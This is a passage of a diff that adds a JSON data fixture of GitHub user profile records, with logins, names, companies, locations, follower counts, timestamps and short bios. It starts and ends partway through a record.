"MDQ6VXNlcjQ3MTUxNTI3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1852, + "fields": { + "nest_created_at": "2024-09-12T00:28:33.541Z", + "nest_updated_at": "2024-09-12T00:28:33.541Z", + "name": "", + "login": "2fortunately", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/54020692?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-08-12T08:08:48Z", + "updated_at": "2024-08-28T19:32:24Z", + "node_id": "MDQ6VXNlcjU0MDIwNjky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1853, + "fields": { + "nest_created_at": "2024-09-12T00:28:34.779Z", + "nest_updated_at": "2024-09-22T19:28:29.478Z", + "name": "Richard Seeton", + "login": "rseeton", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8129464?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2014-07-10T22:17:35Z", + "updated_at": "2024-06-14T11:44:38Z", + "node_id": "MDQ6VXNlcjgxMjk0NjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1854, + "fields": { + "nest_created_at": "2024-09-12T00:28:35.993Z", + "nest_updated_at": "2024-09-22T20:23:36.930Z", + "name": "Jurrie Overgoor", + "login": "Jurrie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1213142?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 53, + "created_at": "2011-11-22T14:34:45Z", + "updated_at": "2024-09-06T08:04:58Z", + "node_id": "MDQ6VXNlcjEyMTMxNDI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1855, + "fields": { + "nest_created_at": "2024-09-12T00:28:37.175Z", + "nest_updated_at": "2024-09-12T00:28:37.175Z", + "name": "Patrick Böder", + "login": "Purii", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7056989?v=4", + "company": "Porsche Digital", + "location": "Ludwigsburg, Germany", + "collaborators_count": 0, + "following_count": 39, + "followers_count": 68, + "public_gists_count": 1, + "public_repositories_count": 30, + "created_at": "2014-03-25T09:47:03Z", + "updated_at": "2024-09-06T11:44:21Z", + "node_id": "MDQ6VXNlcjcwNTY5ODk=", + "bio": "I build software for people. – personal account.\r\n", + "is_hireable": false, + "twitter_username": "whoispurii" + } +}, +{ + "model": "github.user", + "pk": 1856, + "fields": { + "nest_created_at": "2024-09-12T00:28:42.864Z", + "nest_updated_at": "2024-09-12T00:28:42.864Z", + "name": "Sigrid Andersson", + "login": "sigand", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17898038?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2016-03-17T07:20:28Z", + "updated_at": "2024-08-20T10:07:49Z", + "node_id": "MDQ6VXNlcjE3ODk4MDM4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1857, + "fields": { + "nest_created_at": "2024-09-12T00:28:44.067Z", + "nest_updated_at": "2024-09-12T00:28:44.067Z", + "name": "", + "login": "djeanprost", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2271557?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 2, + "created_at": "2012-09-03T15:02:21Z", + "updated_at": "2024-08-28T07:43:44Z", + "node_id": "MDQ6VXNlcjIyNzE1NTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1858, + "fields": { + "nest_created_at": "2024-09-12T00:28:45.266Z", + "nest_updated_at": "2024-09-12T00:29:39.868Z", + "name": "", + "login": "Mridulau", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43175836?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-09-11T13:27:18Z", + "updated_at": "2023-11-20T10:38:16Z", + "node_id": "MDQ6VXNlcjQzMTc1ODM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1859, + "fields": { + "nest_created_at": "2024-09-12T00:28:46.457Z", + "nest_updated_at": "2024-09-12T00:28:46.457Z", + "name": "Jkbang", + "login": "bjk7119", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81218204?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2021-03-23T07:23:58Z", + "updated_at": "2024-08-27T02:55:48Z", + "node_id": "MDQ6VXNlcjgxMjE4MjA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1860, + "fields": { + "nest_created_at": "2024-09-12T00:28:48.073Z", + "nest_updated_at": "2024-09-12T00:29:09.406Z", + "name": "", + "login": "Emilien-S", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/116187542?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-10-19T15:06:50Z", + "updated_at": "2022-10-19T15:06:50Z", + "node_id": "U_kgDOBuzhlg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1861, + "fields": { + "nest_created_at": "2024-09-12T00:28:50.485Z", + "nest_updated_at": "2024-09-12T00:28:50.485Z", + "name": "Amit Agarwal", + "login": "raj77in", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3305948?v=4", + "company": "Individual", + "location": "India", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 41, + "created_at": "2013-01-18T12:16:33Z", + "updated_at": "2024-08-25T07:21:14Z", + "node_id": "MDQ6VXNlcjMzMDU5NDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1862, + "fields": { + "nest_created_at": "2024-09-12T00:28:52.917Z", + "nest_updated_at": "2024-09-22T19:42:32.582Z", + "name": "Matt Colman", + "login": "mtcolman", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33348891?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2017-11-03T12:14:34Z", + "updated_at": "2024-03-18T08:30:11Z", + "node_id": "MDQ6VXNlcjMzMzQ4ODkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1863, + "fields": { + "nest_created_at": "2024-09-12T00:28:55.331Z", + "nest_updated_at": "2024-09-12T00:28:55.331Z", + "name": "Rahma Douma", + "login": "DoumaRahma", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/76129186?v=4", + "company": "Dejardins", + "location": "Montréal", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-12-16T20:13:31Z", + "updated_at": "2024-06-02T15:55:05Z", + "node_id": "MDQ6VXNlcjc2MTI5MTg2", + "bio": "Analyste-programmeuse", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1864, + "fields": { + "nest_created_at": "2024-09-12T00:28:57.758Z", + "nest_updated_at": "2024-09-12T00:28:57.758Z", + "name": "", + "login": "RomRom1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28763142?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-05-17T17:43:33Z", + "updated_at": "2024-09-10T08:49:17Z", + "node_id": "MDQ6VXNlcjI4NzYzMTQy", + "bio": "My projects are on gitlab, sorry", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1865, + "fields": { + "nest_created_at": "2024-09-12T00:28:59.769Z", + "nest_updated_at": "2024-09-12T00:28:59.769Z", + "name": "", + "login": "simondivi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65011929?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-05-08T08:10:53Z", + "updated_at": "2024-04-09T12:13:06Z", + "node_id": "MDQ6VXNlcjY1MDExOTI5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1866, + "fields": { + "nest_created_at": "2024-09-12T00:29:01.832Z", + "nest_updated_at": "2024-09-12T00:29:01.832Z", + "name": "", + "login": "sant0sh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33697194?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2017-11-15T16:50:49Z", + "updated_at": "2024-07-22T13:59:34Z", + "node_id": "MDQ6VXNlcjMzNjk3MTk0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1867, + "fields": { + "nest_created_at": "2024-09-12T00:29:04.030Z", + "nest_updated_at": "2024-09-12T00:29:04.030Z", + "name": "Marc Schöchlin", + "login": "scoopex", + "email": "ms-github@256bit.org", + "avatar_url": "https://avatars.githubusercontent.com/u/288876?v=4", + "company": "Open Source Business Alliance – Bundesverband für digitale Souveränität e.V.", + "location": "Stuttgart", + "collaborators_count": 0, + "following_count": 52, + "followers_count": 68, + "public_gists_count": 0, + "public_repositories_count": 39, + "created_at": "2010-05-27T17:08:45Z", + "updated_at": "2024-09-01T15:14:45Z", + "node_id": "MDQ6VXNlcjI4ODg3Ng==", + "bio": "Site Reliability Engineering/scs.community, Observability, Software Architecture, OpenSource, Linux, Python, Golang, Kubernetes, amused by the cloud naive", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1868, + "fields": { + "nest_created_at": "2024-09-12T00:29:07.773Z", + "nest_updated_at": "2024-09-12T00:33:13.113Z", + "name": "", + "login": "andrewm-aero", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33724014?v=4", + "company": "The Aerospace Corporation", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2017-11-16T13:52:14Z", + "updated_at": "2023-05-23T20:20:24Z", + "node_id": "MDQ6VXNlcjMzNzI0MDE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1869, + "fields": { + "nest_created_at": "2024-09-12T00:29:10.618Z", + "nest_updated_at": "2024-09-12T00:29:10.618Z", + "name": "GUNFLUENZA", + "login": "gun082544", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56395331?v=4", + "company": "IBM Digital Talent for Business", + "location": "Bangkok,Thailand", + "collaborators_count": 0, + "following_count": 45, + "followers_count": 25, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2019-10-10T12:04:20Z", + "updated_at": "2024-05-21T09:38:37Z", + "node_id": "MDQ6VXNlcjU2Mzk1MzMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1870, + "fields": { + "nest_created_at": "2024-09-12T00:29:11.848Z", + "nest_updated_at": "2024-09-12T00:29:11.848Z", + "name": "", + "login": "1187849698", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/122343225?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-01-10T06:33:08Z", + "updated_at": "2023-01-10T06:33:08Z", + "node_id": "U_kgDOB0rPOQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1871, + "fields": { + "nest_created_at": "2024-09-12T00:29:13.113Z", + "nest_updated_at": "2024-09-12T00:29:13.113Z", + "name": "", + "login": "danburke-fidlar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43554048?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-09-24T20:22:49Z", + "updated_at": "2024-07-08T16:15:03Z", + "node_id": "MDQ6VXNlcjQzNTU0MDQ4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1872, + "fields": { + "nest_created_at": "2024-09-12T00:29:14.300Z", + "nest_updated_at": "2024-09-12T00:29:14.300Z", + "name": "Dagang Wei", + "login": "functicons", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38472985?v=4", + "company": "", + "location": "California", + "collaborators_count": 0, + "following_count": 33, + "followers_count": 24, + "public_gists_count": 6, + "public_repositories_count": 107, + "created_at": "2018-04-17T17:44:16Z", + "updated_at": "2024-08-10T11:41:14Z", + "node_id": "MDQ6VXNlcjM4NDcyOTg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1873, + "fields": { + "nest_created_at": "2024-09-12T00:29:16.002Z", + "nest_updated_at": "2024-09-12T00:34:42.889Z", + "name": "Peter Zmilczak", + "login": "marwin1991", + "email": "peter.zmilczak@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25181517?v=4", + "company": "SoftNet LTD, CodeCool LTD", + "location": "Cracow", + "collaborators_count": 0, + "following_count": 67, + "followers_count": 93, + "public_gists_count": 3, + "public_repositories_count": 109, + "created_at": "2017-01-17T17:35:56Z", + "updated_at": "2024-08-23T11:42:40Z", + "node_id": "MDQ6VXNlcjI1MTgxNTE3", + "bio": "Software Engineer Java/Spring/Android - \r\nDevOps Approach Lover - \r\nStock Market Enthusiast\r\n", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1874, + "fields": { + "nest_created_at": "2024-09-12T00:29:17.232Z", + "nest_updated_at": "2024-09-12T00:29:17.232Z", + "name": "", + "login": "parimala-kathir", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72544136?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-10-08T07:17:30Z", + "updated_at": "2023-09-12T12:20:40Z", + "node_id": "MDQ6VXNlcjcyNTQ0MTM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1875, + "fields": { + "nest_created_at": "2024-09-12T00:29:18.449Z", + "nest_updated_at": "2024-09-12T01:31:27.034Z", + "name": "Dr UV Wildner", + "login": "uvwildos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/122446445?v=4", + "company": "OS@German Telekom", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-01-11T10:47:54Z", + "updated_at": "2023-11-20T15:43:41Z", + "node_id": "U_kgDOB0xibQ", + "bio": "problem solving", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1876, + "fields": { + "nest_created_at": "2024-09-12T00:29:19.727Z", + "nest_updated_at": "2024-09-12T00:29:49.326Z", + "name": "", + "login": "jiri-bocan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/97094652?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-01-04T10:13:30Z", + "updated_at": "2024-08-28T10:47:49Z", + "node_id": "U_kgDOBcmL_A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1877, + "fields": { + "nest_created_at": "2024-09-12T00:29:21.352Z", + "nest_updated_at": "2024-09-12T00:29:21.352Z", + "name": "", + "login": "mjrother", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1778861?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2012-05-25T17:53:31Z", + "updated_at": "2023-01-18T20:23:04Z", + "node_id": "MDQ6VXNlcjE3Nzg4NjE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1878, + "fields": { + "nest_created_at": "2024-09-12T00:29:22.568Z", + "nest_updated_at": "2024-09-12T00:29:22.568Z", + "name": "", + "login": "rk7373", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92785266?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-10-19T08:51:54Z", + "updated_at": "2022-11-21T12:22:22Z", + "node_id": "U_kgDOBYfKcg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1879, + "fields": { + "nest_created_at": "2024-09-12T00:29:24.148Z", + "nest_updated_at": "2024-09-12T00:29:24.148Z", + "name": "Przemyslaw Kalucki", + "login": "PAKalucki", + "email": "pakalucki@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11369174?v=4", + "company": "", + "location": "Poland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 26, + "created_at": "2015-03-07T21:48:20Z", + "updated_at": "2024-08-27T13:25:46Z", + "node_id": "MDQ6VXNlcjExMzY5MTc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1880, + "fields": { + "nest_created_at": "2024-09-12T00:29:25.764Z", + "nest_updated_at": "2024-09-12T00:29:25.764Z", + "name": "", + "login": "robocrock", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/123635696?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-01-26T11:05:03Z", + "updated_at": "2023-01-26T11:05:03Z", + "node_id": "U_kgDOB16H8A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1881, + "fields": { + "nest_created_at": "2024-09-12T00:29:27.755Z", + "nest_updated_at": "2024-09-12T00:29:27.755Z", + "name": "", + "login": "simon-n", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1196379?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2011-11-15T11:34:20Z", + "updated_at": "2024-05-21T07:14:22Z", + "node_id": "MDQ6VXNlcjExOTYzNzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1882, + "fields": { + "nest_created_at": "2024-09-12T00:29:28.980Z", + "nest_updated_at": "2024-09-12T00:29:28.980Z", + "name": "Shawn Crain", + "login": "scrain", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/883050?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 2, + "public_gists_count": 9, + "public_repositories_count": 51, + "created_at": "2011-06-29T03:40:25Z", + "updated_at": "2024-06-17T22:10:07Z", + "node_id": "MDQ6VXNlcjg4MzA1MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1883, + "fields": { + "nest_created_at": "2024-09-12T00:29:30.170Z", + "nest_updated_at": "2024-09-12T00:35:09.565Z", + "name": "Nils Christian Ehmke", + "login": "nils-christian", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30949845?v=4", + "company": "", + "location": "Kiel", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 6, + "public_repositories_count": 32, + "created_at": "2017-08-12T08:23:14Z", + "updated_at": "2024-09-04T06:09:53Z", + "node_id": "MDQ6VXNlcjMwOTQ5ODQ1", + "bio": "Software Architect by Destiny", + "is_hireable": false, + "twitter_username": "NilsEhmke" + } +}, +{ + "model": "github.user", + "pk": 1884, + "fields": { + "nest_created_at": "2024-09-12T00:29:34.222Z", + "nest_updated_at": "2024-09-12T00:29:34.222Z", + "name": "", + "login": "13daniel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/102571214?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-03-29T03:54:30Z", + "updated_at": "2024-05-07T10:29:53Z", + "node_id": "U_kgDOBh0czg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1885, + "fields": { + "nest_created_at": "2024-09-12T00:29:35.007Z", + "nest_updated_at": "2024-09-12T00:30:35.058Z", + "name": "Andrea Hade", + "login": "accade", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63321686?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-04-07T22:13:59Z", + "updated_at": "2024-08-09T09:18:23Z", + "node_id": "MDQ6VXNlcjYzMzIxNjg2", + "bio": "Less is more", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1886, + "fields": { + "nest_created_at": "2024-09-12T00:29:36.253Z", + "nest_updated_at": "2024-09-12T00:29:36.253Z", + "name": "Timothy Pillow", + "login": "oregonpillow", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53374403?v=4", + "company": "", + "location": "Zurich", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 59, + "created_at": "2019-07-27T14:34:55Z", + "updated_at": "2024-09-05T18:14:27Z", + "node_id": "MDQ6VXNlcjUzMzc0NDAz", + "bio": "email: vivid.gift2259 fastmail.com", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1887, + "fields": { + "nest_created_at": "2024-09-12T00:29:37.425Z", + "nest_updated_at": "2024-09-12T00:29:37.425Z", + "name": "", + "login": "mansing2", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25703880?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 59, + "created_at": "2017-02-11T09:52:51Z", + "updated_at": "2024-05-30T04:34:50Z", + "node_id": "MDQ6VXNlcjI1NzAzODgw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1888, + "fields": { + "nest_created_at": "2024-09-12T00:29:38.670Z", + "nest_updated_at": "2024-09-12T00:29:38.670Z", + "name": "Lings-Sundar", + "login": "Lingom-R", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55315401?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2019-09-14T10:15:50Z", + "updated_at": "2024-08-19T10:06:29Z", + "node_id": "MDQ6VXNlcjU1MzE1NDAx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1889, + "fields": { + "nest_created_at": "2024-09-12T00:29:41.941Z", + "nest_updated_at": "2024-09-12T00:29:41.941Z", + "name": "", + "login": "manochinnachamy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/90769368?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-09-15T11:51:16Z", + "updated_at": "2023-08-09T04:04:15Z", + "node_id": "MDQ6VXNlcjkwNzY5MzY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1890, + "fields": { + "nest_created_at": "2024-09-12T00:29:43.590Z", + "nest_updated_at": "2024-09-12T00:29:43.590Z", + "name": "Robyn", + "login": "underrobyn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8399207?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 25, + "followers_count": 71, + "public_gists_count": 17, + "public_repositories_count": 60, + "created_at": "2014-08-09T00:09:36Z", + "updated_at": "2024-08-13T11:23:27Z", + "node_id": "MDQ6VXNlcjgzOTkyMDc=", + "bio": "DevSecOps Engineer who dabbles in telecoms & CTFs", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1891, + "fields": { + "nest_created_at": "2024-09-12T00:29:45.261Z", + "nest_updated_at": "2024-09-12T00:29:45.261Z", + "name": "João Filipe", + "login": "byjoaofilipe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78802066?v=4", + "company": "", + "location": "Porto", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-02-09T13:19:36Z", + "updated_at": "2024-06-17T15:03:09Z", + "node_id": "MDQ6VXNlcjc4ODAyMDY2", + "bio": "Keep learning, keep building. ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1892, + "fields": { + "nest_created_at": "2024-09-12T00:29:46.506Z", + "nest_updated_at": "2024-09-12T00:29:46.506Z", + "name": "", + "login": "T1mey", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10464878?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2015-01-09T14:52:31Z", + "updated_at": "2024-04-23T11:45:03Z", + "node_id": "MDQ6VXNlcjEwNDY0ODc4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1893, + "fields": { + "nest_created_at": "2024-09-12T00:29:48.135Z", + "nest_updated_at": "2024-09-12T00:29:48.135Z", + "name": "", + "login": "ChaseStauts", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60838137?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2020-02-09T07:20:37Z", + "updated_at": "2024-07-19T23:09:58Z", + "node_id": "MDQ6VXNlcjYwODM4MTM3", + "bio": "Computer Science undergraduate at Boise State University. Still learning, but that's what life's about.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1894, + "fields": { + "nest_created_at": "2024-09-12T00:29:51.385Z", + "nest_updated_at": "2024-09-12T00:29:51.385Z", + "name": "Inverse Integral", + "login": "InverseIntegral", + "email": "github@matteokamm.ch", + "avatar_url": "https://avatars.githubusercontent.com/u/7516482?v=4", + "company": "Ergon Informatik AG", + "location": "Zürich", + "collaborators_count": 0, + "following_count": 49, + "followers_count": 40, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2014-05-07T20:10:33Z", + "updated_at": "2024-07-17T17:31:22Z", + "node_id": "MDQ6VXNlcjc1MTY0ODI=", + "bio": "Cloud Engineer @ergon", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1895, + "fields": { + "nest_created_at": "2024-09-12T00:29:52.566Z", + "nest_updated_at": "2024-09-12T00:35:44.788Z", + "name": "", + "login": "13CSherman", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36085236?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-02-02T19:03:38Z", + "updated_at": "2022-12-06T20:59:34Z", + "node_id": "MDQ6VXNlcjM2MDg1MjM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1896, + "fields": { + "nest_created_at": "2024-09-12T00:29:53.786Z", + "nest_updated_at": "2024-09-12T00:29:53.786Z", + "name": "Radu Sebastian LAZIN", + "login": "raduking", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18284176?v=4", + "company": "8x8, Inc.", + "location": "Earth", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2016-04-05T11:02:48Z", + "updated_at": "2024-08-15T22:28:53Z", + "node_id": "MDQ6VXNlcjE4Mjg0MTc2", + "bio": "Just love computer programming.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1897, + "fields": { + "nest_created_at": "2024-09-12T00:29:55.011Z", + "nest_updated_at": "2024-09-12T00:29:55.011Z", + "name": "Nigel Jones", + "login": "planetf1", + "email": "nigel.l.jones@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7292002?v=4", + "company": "IBM", + "location": "Brighton & Hove, UK", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 19, + "public_gists_count": 5, + "public_repositories_count": 